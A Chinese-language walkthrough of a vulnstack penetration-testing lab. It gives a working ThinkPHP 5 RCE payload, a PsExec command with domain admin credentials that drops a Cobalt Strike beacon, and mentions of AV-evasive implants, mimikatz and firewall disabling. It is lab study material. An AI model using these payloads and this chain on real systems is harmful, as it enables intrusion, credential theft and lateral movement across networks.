网络配置说明:首先还是需要将自己的网络环境设置完善。域控使用仅主机模式,IP段192.168.138.0/24,且物理机关闭仅主机网卡,保证域控与物理主机无法通信。Win7使用双网卡,一张采用仅主机模式,与域控通信,一张网卡采用NAT模式用于联网与物理机通信。
靶机地址信息:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
信息搜集:
还是常规的信息搜集,做一次主机发现与端口扫描。这里端口扫描采用NMAP,主机扫描采用Nessus同时进行。
开放了80和3306两个端口。
尝试对Mysql进行连接,发现禁止连接:
访问80端口,发现存在一个ThinkPHP的站点,使用不存在的控制保持,确定具体版本:
对于TP5的站点,首先还是利用RCE漏洞打一遍,说不定就成了。然后确实成了了:
https://www.cnblogs.com/backlion/p/10106676.html
payload:index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
尝试写入webshell:
写入成功,执行命令并且连接:
使用蚁剑连接:
使用bypassAV制作一个免杀的CS马,然后上传到服务器,成功获取CS:
内网信息搜集:
首先进行一下内网的信息搜集,看是否存在域:
查看网卡信息:
存在第二张网卡。
通过systeminfo查看系统相关信息:
补丁只存在3个,可以试试有没有可以利用的提权漏洞。
运行了一下mimikatz,成功抓到了heart用户的密码。
同时发现存在域账户的账号密码:
为了方便再弹一个msf的shell,发现靶机环境不是特别好,直接可以获取系统system权限。
然后查看系统的网卡信息:
通过get_local_subnets查看到第二张网卡的信息,应该就是内网地址,添加一个路由去往第二层。
可以查看到我们添加的网卡信息:
之后使用msf的漏洞模块探测内网主机是否存在特定漏洞:
首先是ms17_010
发现扫描应该打开了445端口,但是无法进行利用:
之后还是使用cs进行内网渗透:
先推荐一个cs的教材,以及很多有用的cs插件:https://www.cnblogs.com/ichunqiu/p/12106209.html
首先使用msf反弹一个system权限的shell到cs:
这里是使用cs进行端口扫描,尝试使用psexec进行登录管理系统。
端口扫描结束,可以发现新加了一台目标机器:
如果目标机器出网可以使用psexec尝试登陆,不出网的话需要使用已有的外网机器当作跳板机,使这台外网机器变成一个监听器:
然后重新生成一个shell,选择这个监听器:
之后将psexec和新生成的shell一起上传。
因为win7存在防火墙,可以先关闭防火墙:
之前的heart权限太小,可以利用ms14-058进行提权,elevate插件存在这个提权脚本
获取system权限之后重新关闭防火墙:
接下来就可以使用psexec登录系统然后执行cs的shell:
shell C:\phpStudy\PHPTutorial\WWW\public\PsExec.exe -accepteula \\192.168.138.138 -u SUN\Administrator -p dc123.c0m -d -c C:\phpStudy\PHPTutorial\WWW\public\beacon.exe
获取到DC的shell:时间有点长,需要等待
运行mimikatz尝试获取域控密码:
嗯。。。。。运行的时候beacon全部掉线了。